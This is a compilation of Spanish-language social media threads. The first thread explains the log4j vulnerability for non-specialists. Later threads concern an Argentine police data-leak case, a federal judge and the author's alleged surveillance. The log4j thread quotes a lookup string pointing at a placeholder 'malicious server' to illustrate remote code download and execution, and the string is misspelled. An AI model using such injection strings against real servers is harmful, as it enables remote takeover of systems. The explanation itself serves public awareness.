¿Cuál es el problema de seguridad descubierto en #log4j del que todos los informáticos estamos hablando?
Una explicación lo más simple que pueda para no informáticos. A ver si se entiende. 👇
1) #log4j es un componente de software incluido en muchísimos productos, que se encarga de escribir los "logs" (registros que deja toda aplicación en los servidores, donde queda constancia de cada cosa que se hizo).
2) Cada vez que interactuamos (desde un navegador o una app del celular) con una aplicación web, enviamos "requests" (pedidos) para acceder a determinados recursos o ejecutar acciones. Esos requests contienen distintos "campos" con información que es enviada al servidor.
3) El problema que se descubrió en #log4j es que si en un request se incluye algún campo con el valor "${jdni:ldap://servidormalicioso/codigomalicioso}", el servidor que corre esta biblioteca termina descargando "codigomalicioso" de "servidormalicioso" y ejectuándolo.
4) Esto significa que con solo mandar un request con un campo de este tipo, cualquiera podría lograr ejecutar el código que quisiera en el servidor afectado. Es el tipo de errores que puede ser explotado hasta por alguien sin demasiados conocimientos.
5) ¿Algunos afectados por este problema? Casi nada: iCloud de Apple, Twitter, Minecraft y muchos más. De hecho, se sabe que están afectados varios productos de VMWare, una de las plataformas de virtualización de servidores más usadas.
6) En la inmensa mayoría de los casos ya hay una solución disponible (o al menos una forma de mitigar el problema). Pero aplicarlas muchas veces lleva tiempo, y también hay que revisar cada aplicación hecha a medida usando #log4j.
7) A esta altura todavía no se sabe exactamente cuál es el impacto de #log4j. Lo que sí se sabe es que desde hace días hay varios grupos escaneando servidores en Internet tratando de detectar la vulnerabilidad. Y se espera que pronto aparezca algún "gusano" o virus por el estilo.
8) Otro ejemplo de una vulnerabilidad grave, "escondida" durante años en un componente poco importante al que nadie prestaba demasiada atención. Sí, así está construido el software que usamos.
Voy a contarles una historia tragicómica titulada "El exhorto del juez Rodríguez", que transcurrió mayormente en los Tribunales Federales de Comodoro Py. 👇
Cierto día, en el marco de la investigación por la filtración de datos de la @PFAOficial (#LaGorraLeaks 2.0), el fiscal Horacio Azzolin le avisó al juez Luis Rodríguez que se había olvidado de pedir ciertos datos importantes, y para eso tenía que mandar un exhorto a los EE. UU.
Entonces el juez federal Luis Rodríguez el 20 de abril de 2021 dijo: "bueno, escribamos el exhorto a la Justicia de los EE. UU.", y puso a su gente a trabajar. Y después, se lo mandó a una traductora oficial, ya que a duras penas escriben en español... imaginen en inglés.
ÚLTIMO ESCRITO enviado al juez Luis Rodríguez, luego de que sobreseyera a todos los investigados y archivara la causa por la filtración de datos de la @PFAOficial, #LaGorraLeaks 2.0.
Con canción, cita de libro y dibujito. A ver si al final entiende algo.
La lista de atropellos que sufrimos mi familia y yo por parte de la @PFAOficial con el aval del juez federal LUIS RODRÍGUEZ:
1) Mi pareja y yo fuimos seguidos por la calle y fotografiados, nunca sabré bien durante cuánto tiempo.
2) Se instalaron cámaras de vigilancia frente al domicilio de mis hijos en Río Cuarto. Y en la Ciudad de Buenos Aires, se puso una cámara frente al domicilio de alguien con quien me confundieron.
3) Se pidieron los registros de tarjetas SUBE míos y de mi pareja durante 8 meses y medio.
¡¡¡AL FIN!!!
Después de más de 2 años pude acceder al diagrama con el que la @PFAOficial convención al juez federal Luis Rodríguez de allanarme, detenerme y quitarme mis herramientas de trabajo.
Vamos por partes: 1) Entre las IP de los supuestos atacantes y yo hay en común... hosting en Digital Ocean, Ubuntu como sistema operativo, Nginx como webserver y GoDaddy como registradora. 😳
2) Además tengo conocimientos de administración de sistemas, Python y Java... 🤔